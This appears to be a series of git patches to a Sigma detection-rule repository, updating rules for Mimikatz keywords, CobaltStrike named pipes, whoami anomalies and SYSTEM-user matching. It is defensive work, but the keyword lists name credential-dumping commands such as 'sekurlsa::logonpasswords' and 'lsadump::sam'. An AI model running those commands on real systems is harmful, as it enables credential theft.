Nuclei -- Penetration Testing Activity -- Unknown + - Scanning from Nuclei + - Penetration Testing Activity tags: -- attack.initial_access -- attack.t1190 + - attack.initial_access + - attack.t1190 level: critical From bdb8dbc0dee81e235552d466f71582d29a85b1c6 Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Wed, 25 Aug 2021 20:04:38 +0200 Subject: [PATCH 0584/1367] fix title Joomla JaShowcase --- rules/web/web_cve_2010_5278_exploitation_attempt.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/web/web_cve_2010_5278_exploitation_attempt.yml b/rules/web/web_cve_2010_5278_exploitation_attempt.yml index 49100bc5..3540cbf3 100644 --- a/rules/web/web_cve_2010_5278_exploitation_attempt.yml +++ b/rules/web/web_cve_2010_5278_exploitation_attempt.yml @@ -1,4 +1,4 @@ -title: CVE-2010-5278 Exploitation Attempt +title: CVE-2010-5278 Joomla JaShowcase Exploitation Attempt id: 55a72ccd-4f16-42a7-afc8-f7958035bf90 author: Subhash Popuri (@pbssubhash) date: 2021/08/25 From 3eb3377a7b89393786f2b5036ec82a9a6e8aec7b Mon Sep 17 00:00:00 2001 From: frack113 Date: Thu, 26 Aug 2021 06:51:37 +0200 Subject: [PATCH 0585/1367] check valid date order --- tests/test_rules.py | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/tests/test_rules.py b/tests/test_rules.py index 4c01de39..730c2ed0 100755 --- a/tests/test_rules.py +++ b/tests/test_rules.py @@ -335,6 +335,9 @@ class TestRules(unittest.TestCase): elif len(datefield) != 10: print(Fore.YELLOW + "Rule {} has a malformed 'date' (not 10 chars, should be YYYY/MM/DD).".format(file)) faulty_rules.append(file) + elif datefield[4] != '/' or datefield[7] != '/': + print(Fore.YELLOW + "Rule {} has a malformed 'date' (should be YYYY/MM/DD).".format(file)) + faulty_rules.append(file) self.assertEqual(faulty_rules, [], Fore.RED + "There are rules with missing or malformed 'date' fields. (create one, e.g. date: 2019/01/14)") @@ -350,6 +353,9 @@ class TestRules(unittest.TestCase): elif len(modifiedfield) != 10: print(Fore.YELLOW + "Rule {} has a malformed 'modified' (not 10 chars, should be YYYY/MM/DD).".format(file)) faulty_rules.append(file) + elif modifiedfield[4] != '/' or modifiedfield[7] != '/': + print(Fore.YELLOW + "Rule {} has a malformed 'modified' (should be YYYY/MM/DD).".format(file)) + faulty_rules.append(file) self.assertEqual(faulty_rules, [], Fore.RED + "There are rules with malformed 'modified' fields. (create one, e.g. date: 2019/01/14)") From e66007a43d94c7591fbb42dd3fe3fc1b4779ae98 Mon Sep 17 00:00:00 2001 From: "f.hubaut" Date: Thu, 26 Aug 2021 11:15:33 +0200 Subject: [PATCH 0586/1367] fix file name case --- ...uditd_susp_C2_commands.yml => lnx_auditd_susp_c2_commands.yml} | 0 ...ation_LOLScript.yml => powershell_cl_invocation_lolscript.yml} | 0 ...Script_v2.yml => powershell_cl_invocation_lolscript_count.yml} | 0 ...s_LOLScript.yml => powershell_cl_mutexverifiers_lolscript.yml} | 0 ...pt_v2.yml => powershell_cl_mutexverifiers_lolscript_count.yml} | 0 ...L_Invocation_LOLScript.yml => win_cl_invocation_lolscript.yml} | 0 ...erifiers_LOLScript.yml => win_cl_mutexverifiers_lolscript.yml} | 0 7 files changed, 0 insertions(+), 0 deletions(-) rename rules/linux/auditd/{lnx_auditd_susp_C2_commands.yml => lnx_auditd_susp_c2_commands.yml} (100%) rename rules/windows/powershell/{powershell_CL_Invocation_LOLScript.yml => powershell_cl_invocation_lolscript.yml} (100%) rename rules/windows/powershell/{powershell_CL_Invocation_LOLScript_v2.yml => powershell_cl_invocation_lolscript_count.yml} (100%) rename rules/windows/powershell/{powershell_CL_Mutexverifiers_LOLScript.yml => powershell_cl_mutexverifiers_lolscript.yml} (100%) rename rules/windows/powershell/{powershell_CL_Mutexverifiers_LOLScript_v2.yml => powershell_cl_mutexverifiers_lolscript_count.yml} (100%) rename rules/windows/process_creation/{win_CL_Invocation_LOLScript.yml => win_cl_invocation_lolscript.yml} (100%) rename rules/windows/process_creation/{win_CL_Mutexverifiers_LOLScript.yml => win_cl_mutexverifiers_lolscript.yml} (100%) diff --git a/rules/linux/auditd/lnx_auditd_susp_C2_commands.yml b/rules/linux/auditd/lnx_auditd_susp_c2_commands.yml similarity index 100% rename from rules/linux/auditd/lnx_auditd_susp_C2_commands.yml rename to rules/linux/auditd/lnx_auditd_susp_c2_commands.yml diff --git a/rules/windows/powershell/powershell_CL_Invocation_LOLScript.yml b/rules/windows/powershell/powershell_cl_invocation_lolscript.yml similarity index 100% rename from rules/windows/powershell/powershell_CL_Invocation_LOLScript.yml rename to rules/windows/powershell/powershell_cl_invocation_lolscript.yml diff --git a/rules/windows/powershell/powershell_CL_Invocation_LOLScript_v2.yml b/rules/windows/powershell/powershell_cl_invocation_lolscript_count.yml similarity index 100% rename from rules/windows/powershell/powershell_CL_Invocation_LOLScript_v2.yml rename to rules/windows/powershell/powershell_cl_invocation_lolscript_count.yml diff --git a/rules/windows/powershell/powershell_CL_Mutexverifiers_LOLScript.yml b/rules/windows/powershell/powershell_cl_mutexverifiers_lolscript.yml similarity index 100% rename from rules/windows/powershell/powershell_CL_Mutexverifiers_LOLScript.yml rename to rules/windows/powershell/powershell_cl_mutexverifiers_lolscript.yml diff --git a/rules/windows/powershell/powershell_CL_Mutexverifiers_LOLScript_v2.yml b/rules/windows/powershell/powershell_cl_mutexverifiers_lolscript_count.yml similarity index 100% rename from rules/windows/powershell/powershell_CL_Mutexverifiers_LOLScript_v2.yml rename to rules/windows/powershell/powershell_cl_mutexverifiers_lolscript_count.yml diff --git a/rules/windows/process_creation/win_CL_Invocation_LOLScript.yml b/rules/windows/process_creation/win_cl_invocation_lolscript.yml similarity index 100% rename from rules/windows/process_creation/win_CL_Invocation_LOLScript.yml rename to rules/windows/process_creation/win_cl_invocation_lolscript.yml diff --git a/rules/windows/process_creation/win_CL_Mutexverifiers_LOLScript.yml b/rules/windows/process_creation/win_cl_mutexverifiers_lolscript.yml similarity index 100% rename from rules/windows/process_creation/win_CL_Mutexverifiers_LOLScript.yml rename to rules/windows/process_creation/win_cl_mutexverifiers_lolscript.yml From 8b318b9273055a057b22b59c34081b8612b5dd97 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Thu, 26 Aug 2021 12:51:45 +0200 Subject: [PATCH 0587/1367] refactor: Mimikatz keyword rule refactoring --- .../builtin/win_alert_mimikatz_keywords.yml | 27 +++++++++++-------- 1 file changed, 16 insertions(+), 11 deletions(-) diff --git a/rules/windows/builtin/win_alert_mimikatz_keywords.yml b/rules/windows/builtin/win_alert_mimikatz_keywords.yml index a9d26409..522a9f0a 100644 --- a/rules/windows/builtin/win_alert_mimikatz_keywords.yml +++ b/rules/windows/builtin/win_alert_mimikatz_keywords.yml @@ -3,7 +3,7 @@ id: 06d71506-7beb-4f22-8888-e2e5e2ca7fd8 description: This method detects mimikatz keywords in different Eventlogs (some of them only appear in older Mimikatz version that are however still used by different threat groups) author: Florian Roth date: 2017/01/10 -modified: 2019/10/11 +modified: 2021/08/26 tags: - attack.s0002 - attack.t1003 # an old one @@ -19,18 +19,23 @@ logsource: product: windows detection: keywords: - - "mimikatz" - - "mimilib" - - "<3 eo.oe" - - "eo.oe.kiwi" - - "privilege::debug" - - "sekurlsa::logonpasswords" - - "lsadump::sam" - - "mimidrv.sys" - - " p::d " - - " s::l " + - '\mimikatz' + - 'mimikatz.exe' + - '\mimilib.dll' + - '<3 eo.oe' + - 'eo.oe.kiwi' + - 'privilege::debug' + - 'sekurlsa::logonpasswords' + - 'lsadump::sam' + - 'mimidrv.sys' + - ' p::d ' + - ' s::l ' + - 'gentilkiwi.com' + - 'Kiwi Legit Printer' condition: keywords falsepositives: - Naughty administrators - Penetration test + - AV Signature updates + - Files with Mimikatz in their filename level: critical From 217dbc768a83276fa44d895b4945f9874f8cd117 Mon Sep 17 00:00:00 2001 From: phantinuss Date: Thu, 26 Aug 2021 12:53:30 +0200 Subject: [PATCH 0588/1367] More malleable CobaltStrike C2 profiles from new source/reference --- .../pipe_created/sysmon_mal_cobaltstrike_re.yml | 14 ++++++++++++++ .../sysmon_susp_cobaltstrike_pipe_patterns.yml | 8 +++++++- 2 files changed, 21 insertions(+), 1 deletion(-) diff --git a/rules/windows/pipe_created/sysmon_mal_cobaltstrike_re.yml b/rules/windows/pipe_created/sysmon_mal_cobaltstrike_re.yml index 97b9e587..8a652960 100644 --- a/rules/windows/pipe_created/sysmon_mal_cobaltstrike_re.yml +++ b/rules/windows/pipe_created/sysmon_mal_cobaltstrike_re.yml @@ -4,7 +4,9 @@ status: experimental description: Detects the creation of a named pipe matching a pattern used by CobaltStrike Malleable C2 profiles references: - https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575 + - https://gist.github.com/MHaggis/6c600e524045a6d49c35291a21e10752 date: 2021/07/30 +modifed: 2021/08/26 author: Florian Roth tags: - attack.defense_evasion @@ -19,6 +21,7 @@ detection: - PipeName|re: '\\mojo\.5688\.8052\.183894939787088877[0-9a-f]{2}' - PipeName|re: '\\mojo\.5688\.8052\.35780273329370473[0-9a-f]{2}' - PipeName|re: '\\wkssvc[0-9a-f]{2}' + - PipeName|re: '\\wkssvc_[0-9a-f]{2}' - PipeName|re: '\\ntsvcs[0-9a-f]{2}' - PipeName|re: '\\DserNamePipe[0-9a-f]{2}' - PipeName|re: '\\SearchTextHarvester[0-9a-f]{2}' @@ -29,6 +32,17 @@ detection: - PipeName|re: '\\ntsvcs_[0-9a-f]{2}' - PipeName|re: '\\scerpc_[0-9a-f]{2}' - PipeName|re: '\\scerpc[0-9a-f]{2}' + - PipeName|re: '\\PGMessagePipe[0-9a-f]{2}' + - PipeName|re: '\\MsFteWds[0-9a-f]{2}' + - PipeName|re: '\\f4c3[0-9a-f]{2}' + - PipeName|re: '\\fullduplex_[0-9a-f]{2}' + - PipeName|re: '\\msrpc_[0-9a-f]{4}' + - PipeName|re: '\\win\\msrpc_[0-9a-f]{2}' + - PipeName|re: '\\f53f[0-9a-f]{2}' + - PipeName|re: '\\rpc_[0-9a-f]{2}' + - PipeName|re: '\\spoolss_[0-9a-f]{2}' + - PipeName|re: '\\windows\.update\.manager[0-9a-f]{3}' + - PipeName|re: '\\Winsock2\\CatalogChangeListener-[0-9a-f]{3}-0,' condition: selection falsepositives: - Unknown diff --git a/rules/windows/pipe_created/sysmon_susp_cobaltstrike_pipe_patterns.yml b/rules/windows/pipe_created/sysmon_susp_cobaltstrike_pipe_patterns.yml index c9a3da84..eb4066b0 100644 --- a/rules/windows/pipe_created/sysmon_susp_cobaltstrike_pipe_patterns.yml +++ b/rules/windows/pipe_created/sysmon_susp_cobaltstrike_pipe_patterns.yml @@ -4,7 +4,9 @@ status: experimental description: Detects the creation of a named pipe with a pattern found in CobaltStrike malleable C2 profiles references: - https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575 + - https://gist.github.com/MHaggis/6c600e524045a6d49c35291a21e10752 date: 2021/07/30 +modified: 2021/08/26 author: Florian Roth tags: - attack.defense_evasion @@ -16,13 +18,17 @@ logsource: definition: 'Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). In the current popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config) this is not there, you have to add it yourself.' detection: selection_malleable_profiles: - PipeName|startswith: + - PipeName|startswith: - '\mojo.5688.8052.183894939787088877' - '\mojo.5688.8052.35780273329370473' - '\mypipe-f' - '\mypipe-h' - '\ntsvcs_' - '\scerpc_' + - '\win_svc' + - PipeName: + - '\demoagent_11' + - '\demoagent_22' condition: selection_malleable_profiles falsepositives: - Chrome instances using the exactly same name pipe named mojo.something From a231aa73b306a3330885d13af44f05a53e93d9e7 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Thu, 26 Aug 2021 13:33:25 +0200 Subject: [PATCH 0589/1367] fix: FPs with whoami rule and 4688 event IDs without parent info --- .../process_creation/win_susp_whoami_anomaly.yml | 10 ++++++++-- 1 file changed, 8 insertions(+), 2 deletions(-) diff --git a/rules/windows/process_creation/win_susp_whoami_anomaly.yml b/rules/windows/process_creation/win_susp_whoami_anomaly.yml index 62184377..123646b0 100644 --- a/rules/windows/process_creation/win_susp_whoami_anomaly.yml +++ b/rules/windows/process_creation/win_susp_whoami_anomaly.yml @@ -7,6 +7,7 @@ references: - https://app.any.run/tasks/7eaba74e-c1ea-400f-9c17-5e30eee89906/ author: Florian Roth date: 2021/08/12 +modified: 2021/08/26 tags: - attack.discovery - attack.t1033 @@ -17,17 +18,22 @@ logsource: detection: selection: Image|endswith: '\whoami.exe' - filter: + filter1: ParentImage|endswith: - '\cmd.exe' - '\powershell.exe' + filter2: + ParentImage: + - 'C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe' + - '' + - null selection_special: CommandLine|contains: - 'whoami -all' - 'whoami /all' - 'whoami.exe -all' - 'whoami.exe /all' - condition: ( selection and not filter ) or selection_special + condition: ( selection and not filter1 and not filter2 ) or selection_special falsepositives: - Admin activity - Scripts and administrative tools used in the monitored environment From 24d8701f15f4b771cf563657269acd8215994515 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Thu, 26 Aug 2021 13:54:18 +0200 Subject: [PATCH 0590/1367] fix: null cannot be used in a list with other values --- rules/windows/process_creation/win_susp_whoami_anomaly.yml | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/rules/windows/process_creation/win_susp_whoami_anomaly.yml b/rules/windows/process_creation/win_susp_whoami_anomaly.yml index 123646b0..f802e6ef 100644 --- a/rules/windows/process_creation/win_susp_whoami_anomaly.yml +++ b/rules/windows/process_creation/win_susp_whoami_anomaly.yml @@ -26,14 +26,15 @@ detection: ParentImage: - 'C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe' - '' - - null + filter3: + ParentImage: null selection_special: CommandLine|contains: - 'whoami -all' - 'whoami /all' - 'whoami.exe -all' - 'whoami.exe /all' - condition: ( selection and not filter1 and not filter2 ) or selection_special + condition: ( selection and not filter1 and not filter2 and not filter3 ) or selection_special falsepositives: - Admin activity - Scripts and administrative tools used in the monitored environment From 6c7d355ef5db5f8cd2d7c6c32f3cb250a3088582 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Thu, 26 Aug 2021 14:00:57 +0200 Subject: [PATCH 0591/1367] Try to add more pipe names to this non-regex rule --- .../sysmon_susp_cobaltstrike_pipe_patterns.yml | 7 ++++++- 1 file changed, 6 insertions(+), 1 deletion(-) diff --git a/rules/windows/pipe_created/sysmon_susp_cobaltstrike_pipe_patterns.yml b/rules/windows/pipe_created/sysmon_susp_cobaltstrike_pipe_patterns.yml index eb4066b0..07e196d8 100644 --- a/rules/windows/pipe_created/sysmon_susp_cobaltstrike_pipe_patterns.yml +++ b/rules/windows/pipe_created/sysmon_susp_cobaltstrike_pipe_patterns.yml @@ -7,7 +7,7 @@ references: - https://gist.github.com/MHaggis/6c600e524045a6d49c35291a21e10752 date: 2021/07/30 modified: 2021/08/26 -author: Florian Roth +author: Florian Roth, Christian Burkard tags: - attack.defense_evasion - attack.privilege_escalation @@ -26,9 +26,14 @@ detection: - '\ntsvcs_' - '\scerpc_' - '\win_svc' + - '\spoolss_' + - '\msrpc_' + - '\win\msrpc_' + - '\wkssvc_' - PipeName: - '\demoagent_11' - '\demoagent_22' + - '\PGMessagePipe' condition: selection_malleable_profiles falsepositives: - Chrome instances using the exactly same name pipe named mojo.something From dc192685833106e9e994e10d316a9a2154d3456a Mon Sep 17 00:00:00 2001 From: phantinuss <79651203+phantinuss@users.noreply.github.com> Date: Thu, 26 Aug 2021 14:25:12 +0200 Subject: [PATCH 0592/1367] remove becasue of possible conflict with a legitimate tool (https://labs.nettitude.com/blog/cve-2017-16245-cve-2017-16246-avecto-defendpoint-multiple-vulnerabilities/) --- .../pipe_created/sysmon_susp_cobaltstrike_pipe_patterns.yml | 1 - 1 file changed, 1 deletion(-) diff --git a/rules/windows/pipe_created/sysmon_susp_cobaltstrike_pipe_patterns.yml b/rules/windows/pipe_created/sysmon_susp_cobaltstrike_pipe_patterns.yml index 07e196d8..b82fae6d 100644 --- a/rules/windows/pipe_created/sysmon_susp_cobaltstrike_pipe_patterns.yml +++ b/rules/windows/pipe_created/sysmon_susp_cobaltstrike_pipe_patterns.yml @@ -33,7 +33,6 @@ detection: - PipeName: - '\demoagent_11' - '\demoagent_22' - - '\PGMessagePipe' condition: selection_malleable_profiles falsepositives: - Chrome instances using the exactly same name pipe named mojo.something From 644397e65cd19999c7fbb7e2aa8d5ed90fd6207e Mon Sep 17 00:00:00 2001 From: mlp1515 <69857628+mlp1515@users.noreply.github.com> Date: Thu, 26 Aug 2021 12:41:36 +0000 Subject: [PATCH 0593/1367] Update win_exploit_cve_2019_1388.yml French language settings --- rules/windows/process_creation/win_exploit_cve_2019_1388.yml | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/rules/windows/process_creation/win_exploit_cve_2019_1388.yml b/rules/windows/process_creation/win_exploit_cve_2019_1388.yml index c93f2113..096c1994 100644 --- a/rules/windows/process_creation/win_exploit_cve_2019_1388.yml +++ b/rules/windows/process_creation/win_exploit_cve_2019_1388.yml @@ -7,6 +7,7 @@ references: - https://www.zerodayinitiative.com/blog/2019/11/19/thanksgiving-treat-easy-as-pie-windows-7-secure-desktop-escalation-of-privilege author: Florian Roth date: 2019/11/20 +modified: 2021/08/26 tags: - attack.privilege_escalation - attack.t1068 @@ -21,7 +22,9 @@ detection: rights1: IntegrityLevel: 'System' # for Sysmon users rights2: - User: 'NT AUTHORITY\SYSTEM' # for non-Sysmon users - English language settings + User|startswith: + - 'NT AUTHORITY\SYSTEM' # for non-Sysmon users - English language settings + - 'AUTORITE NT\Sys' # French language settings condition: selection and ( rights1 or rights2 ) falsepositives: - Unknown From 7ad927f28eeb307d2f0a6b0dc48ab5f8a68926fe Mon Sep 17 00:00:00 2001 From: mlp1515 <69857628+mlp1515@users.noreply.github.com> Date: Thu, 26 Aug 2021 12:42:47 +0000 Subject: [PATCH 0594/1367] Update win_wmiprvse_spawning_process.yml French language settings --- .../process_creation/win_wmiprvse_spawning_process.yml | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/rules/windows/process_creation/win_wmiprvse_spawning_process.yml b/rules/windows/process_creation/win_wmiprvse_spawning_process.yml index e0da3a8c..d3e6843f 100644 --- a/rules/windows/process_creation/win_wmiprvse_spawning_process.yml +++ b/rules/windows/process_creation/win_wmiprvse_spawning_process.yml @@ -3,7 +3,7 @@ id: d21374ff-f574-44a7-9998-4a8c8bf33d7d description: Detects wmiprvse spawning processes status: experimental date: 2019/08/15 -modified: 2021/02/24 +modified: 2021/08/26 author: Roberto Rodriguez @Cyb3rWard0g references: - https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190810201010.html @@ -23,7 +23,9 @@ detection: - SubjectLogonId: - '0x3e7' # LUID 999 for SYSTEM - 'null' # too many false positives - - User: 'NT AUTHORITY\SYSTEM' # if we don't have LogonId data, fallback on username detection + - User|startswith: + - 'NT AUTHORITY\SYSTEM' # if we don't have LogonId data, fallback on username detection + - 'AUTORITE NT\Sys' # French language settings - Image|endswith: - '\WmiPrvSE.exe' - '\WerFault.exe' From 5545403a9bea797684912b8d5709c78f2284e888 Mon Sep 17 00:00:00 2001 From: mlp1515 <69857628+mlp1515@users.noreply.github.com> Date: Thu, 26 Aug 2021 12:43:33 +0000 Subject: [PATCH 0595/1367] Update win_whoami_as_system.yml French language settings --- rules/windows/process_creation/win_whoami_as_system.yml | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/rules/windows/process_creation/win_whoami_as_system.yml b/rules/windows/process_creation/win_whoami_as_system.yml index 4fee1a9e..cdfa30d2 100644 --- a/rules/windows/process_creation/win_whoami_as_system.yml +++ b/rules/windows/process_creation/win_whoami_as_system.yml @@ -6,7 +6,7 @@ references: - https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment author: Teymur Kheirkhabarov date: 2019/10/23 -modified: 2019/11/11 +modified: 2021/08/26 tags: - attack.privilege_escalation - attack.discovery @@ -16,7 +16,9 @@ logsource: product: windows detection: selection: - User: 'NT AUTHORITY\SYSTEM' + User|startswith: + - 'NT AUTHORITY\SYSTEM' + - 'AUTORITE NT\Sys' # French language settings Image|endswith: '\whoami.exe' condition: selection falsepositives: From 5f419d6f3524f8cfb9f2766be64a973034754555 Mon Sep 17 00:00:00 2001 From: mlp1515 <69857628+mlp1515@users.noreply.github.com> Date: Thu, 26 Aug 2021 12:44:35 +0000 Subject: [PATCH 0596/1367] Update win_susp_taskmgr_localsystem.yml French language settings --- .../process_creation/win_susp_taskmgr_localsystem.yml | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/rules/windows/process_creation/win_susp_taskmgr_localsystem.yml b/rules/windows/process_creation/win_susp_taskmgr_localsystem.yml index 4ac61fed..2ec58e2c 100644 --- a/rules/windows/process_creation/win_susp_taskmgr_localsystem.yml +++ b/rules/windows/process_creation/win_susp_taskmgr_localsystem.yml @@ -7,12 +7,15 @@ tags: - attack.t1036 author: Florian Roth date: 2018/03/18 +modified: 2021/08/26 logsource: category: process_creation product: windows detection: selection: - User: NT AUTHORITY\SYSTEM + User|startswith: + - 'NT AUTHORITY\SYSTEM' + - 'AUTORITE NT\Sys' # French language settings Image|endswith: '\taskmgr.exe' condition: selection falsepositives: From a31422db74d961235a78d03752912e80e49016c6 Mon Sep 17 00:00:00 2001 From: mlp1515 <69857628+mlp1515@users.noreply.github.com> Date: Thu, 26 Aug 2021 12:45:24 +0000 Subject: [PATCH 0597/1367] Update win_susp_schtask_creation.yml French language settings --- rules/windows/process_creation/win_susp_schtask_creation.yml | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/rules/windows/process_creation/win_susp_schtask_creation.yml b/rules/windows/process_creation/win_susp_schtask_creation.yml index 1647d2f5..bc671f4c 100644 --- a/rules/windows/process_creation/win_susp_schtask_creation.yml +++ b/rules/windows/process_creation/win_susp_schtask_creation.yml @@ -4,6 +4,7 @@ status: experimental description: Detects the creation of scheduled tasks in user session author: Florian Roth date: 2019/01/16 +modified: 2021/08/26 logsource: category: process_creation product: windows @@ -12,7 +13,9 @@ detection: Image|endswith: '\schtasks.exe' CommandLine|contains: ' /create ' filter: - User: NT AUTHORITY\SYSTEM + User|startswith: + - 'NT AUTHORITY\SYSTEM' + - 'AUTORITE NT\Sys' # French language settings condition: selection and not filter fields: - CommandLine From 4f49f03460e2e92d5482b3d4e8600c756c8e3bb1 Mon Sep 17 00:00:00 2001 From: mlp1515 <69857628+mlp1515@users.noreply.github.com> Date: Thu, 26 Aug 2021 12:46:15 +0000 Subject: [PATCH 0598/1367] Update sysmon_abusing_debug_privilege.yml French language settings --- .../process_creation/sysmon_abusing_debug_privilege.yml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/rules/windows/process_creation/sysmon_abusing_debug_privilege.yml b/rules/windows/process_creation/sysmon_abusing_debug_privilege.yml index 399103d2..041bba07 100644 --- a/rules/windows/process_creation/sysmon_abusing_debug_privilege.yml +++ b/rules/windows/process_creation/sysmon_abusing_debug_privilege.yml @@ -28,7 +28,9 @@ detection: - '\powershell.exe' - '\cmd.exe' selection3: - User: 'NT AUTHORITY\SYSTEM' + User|startswith: + - 'NT AUTHORITY\SYSTEM' + - 'AUTORITE NT\Sys' # French language settings filter: CommandLine|contains|all: - ' route ' From e9ed5f592cbda58f771b167471fbf2b71018f985 Mon Sep 17 00:00:00 2001 From: mlp1515 <69857628+mlp1515@users.noreply.github.com> Date: Thu, 26 Aug 2021 12:48:59 +0000 Subject: [PATCH 0599/1367] Update sysmon_always_install_elevated_windows_installer.yml French language settings --- .../sysmon_always_install_elevated_windows_installer.yml | 7 +++++-- 1 file changed, 5 insertions(+), 2 deletions(-) diff --git a/rules/windows/process_creation/sysmon_always_install_elevated_windows_installer.yml b/rules/windows/process_creation/sysmon_always_install_elevated_windows_installer.yml index 8d89e217..4aa3afd0 100644 --- a/rules/windows/process_creation/sysmon_always_install_elevated_windows_installer.yml +++ b/rules/windows/process_creation/sysmon_always_install_elevated_windows_installer.yml @@ -4,6 +4,7 @@ description: This rule will looks for Windows Installer service (msiexec.exe) wh status: experimental author: Teymur Kheirkhabarov (idea), Mangatas Tondang (rule), oscd.community date: 2020/10/13 +modified: 2021/08/26 references: - https://image.slidesharecdn.com/kheirkhabarovoffzonefinal-181117201458/95/hunting-for-privilege-escalation-in-windows-environment-48-638.jpg tags: @@ -16,7 +17,9 @@ detection: integrity_level: IntegrityLevel: 'System' user: - User: 'NT AUTHORITY\SYSTEM' + User|startswith: + - 'NT AUTHORITY\SYSTEM' + - 'AUTORITE NT\Sys' # French language settings image_1: Image|contains|all: - '\Windows\Installer\' @@ -34,4 +37,4 @@ fields: falsepositives: - System administrator Usage - Penetration test -level: medium \ No newline at end of file +level: medium From e1aa82b412457c154fe9a5db3a8fb1b6ee4cdf67 Mon Sep 17 00:00:00 2001 From: mlp1515 <69857628+mlp1515@users.noreply.github.com> Date: Thu, 26 Aug 2021 12:50:24 +0000 Subject: [PATCH 0600/1367] Update win_susp_tscon_localsystem.yml French language settings --- .../windows/process_creation/win_susp_tscon_localsystem.yml | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/rules/windows/process_creation/win_susp_tscon_localsystem.yml b/rules/windows/process_creation/win_susp_tscon_localsystem.yml index b11145b6..d04687d1 100644 --- a/rules/windows/process_creation/win_susp_tscon_localsystem.yml +++ b/rules/windows/process_creation/win_susp_tscon_localsystem.yml @@ -7,6 +7,7 @@ references: - https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6 author: Florian Roth date: 2018/03/17 +modified: 2021/08/26 tags: - attack.command_and_control - attack.t1219 @@ -15,7 +16,9 @@ logsource: product: windows detection: selection: - User: NT AUTHORITY\SYSTEM + User|startswith: + - 'NT AUTHORITY\SYSTEM' + - 'AUTORITE NT\Sys' # French language settings Image|endswith: '\tscon.exe' condition: selection falsepositives: From cce7cfc79af8e7667e8a0a25d2d7f44e43be890e Mon Sep 17 00:00:00 2001 From: mlp1515 <69857628+mlp1515@users.noreply.github.com> Date: Thu, 26 Aug 2021 12:51:45 +0000 Subject: [PATCH 0601/1367] Update win_tool_psexec.yml French language settings --- rules/windows/other/win_tool_psexec.yml | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/rules/windows/other/win_tool_psexec.yml b/rules/windows/other/win_tool_psexec.yml index 22a4d3da..250429d1 100644 --- a/rules/windows/other/win_tool_psexec.yml +++ b/rules/windows/other/win_tool_psexec.yml @@ -5,7 +5,7 @@ status: experimental description: Detects PsExec service installation and execution events (service and Sysmon) author: Thomas Patzke date: 2017/06/12 -modified: 2021/08/06 +modified: 2021/08/26 references: - https://www.jpcert.or.jp/english/pub/sr/ir_research.html - https://jpcertcc.github.io/ToolAnalysisResultSheet @@ -46,7 +46,9 @@ logsource: detection: sysmon_processcreation: Image|endswith: '\PSEXESVC.exe' - User: 'NT AUTHORITY\SYSTEM' + User|startswith: + - 'NT AUTHORITY\SYSTEM' + - 'AUTORITE NT\Sys' # French language settings --- logsource: category: pipe_created From e59b8e1e3efca77ca5d09032da72538cf90a7862 Mon Sep 17 00:00:00 2001 From: phantinuss Date: Thu, 26 Aug 2021 14:53:20 +0200 Subject: [PATCH 0602/1367] add applicable pipe names from regex rule --- ...sysmon_susp_cobaltstrike_pipe_patterns.yml | 31 ++++++++++++++++--- 1 file changed, 26 insertions(+), 5 deletions(-) diff --git a/rules/windows/pipe_created/sysmon_susp_cobaltstrike_pipe_patterns.yml b/rules/windows/pipe_created/sysmon_susp_cobaltstrike_pipe_patterns.yml index b82fae6d..9ee3bbae 100644 --- a/rules/windows/pipe_created/sysmon_susp_cobaltstrike_pipe_patterns.yml +++ b/rules/windows/pipe_created/sysmon_susp_cobaltstrike_pipe_patterns.yml @@ -23,17 +23,38 @@ detection: - '\mojo.5688.8052.35780273329370473' - '\mypipe-f' - '\mypipe-h' - - '\ntsvcs_' - - '\scerpc_' + - '\ntsvcs' + - '\scerpc' - '\win_svc' - - '\spoolss_' + - '\spoolss' - '\msrpc_' - '\win\msrpc_' - - '\wkssvc_' + - '\wkssvc' + - '\f53f' + - '\windows.update.manager' + - '\SearchTextHarvester' + - '\DserNamePipe' + - '\PGMessagePipe' + - '\MsFteWds' + - '\f4c3' + - '\fullduplex_' + - '\rpc_' - PipeName: - '\demoagent_11' - '\demoagent_22' - condition: selection_malleable_profiles + selection_malleable_profile_CatalogChangeListener: + PipeName|startswith: '\Winsock2\CatalogChangeListener-' + PipeName|endswith: '-0,' + filter: + PipeName: + - '\wkssvc' + - '\spoolss' + - '\scerpc' + - '\ntsvcs' + - '\SearchTextHarvester' + - '\PGMessagePipe' + - '\MsFteWds' + condition: 1 of selection_malleable_profile* and not filter falsepositives: - Chrome instances using the exactly same name pipe named mojo.something level: high From a5d175fbf7e1564dc1e77d97192bfddcd4058b91 Mon Sep 17 00:00:00 2001 From: David Hazekamp Date: Thu, 26 Aug 2021 14:05:44 -0500 Subject: [PATCH 0603/1367] feat(backend): introducing lacework backend --- tools/sigma/backends/lacework.py | 615 +++++++++++++++++++++++++++++++ 1 file changed, 615 insertions(+) create mode 100644 tools/sigma/backends/lacework.py diff --git a/tools/sigma/backends/lacework.py b/tools/sigma/backends/lacework.py new file mode 100644 index 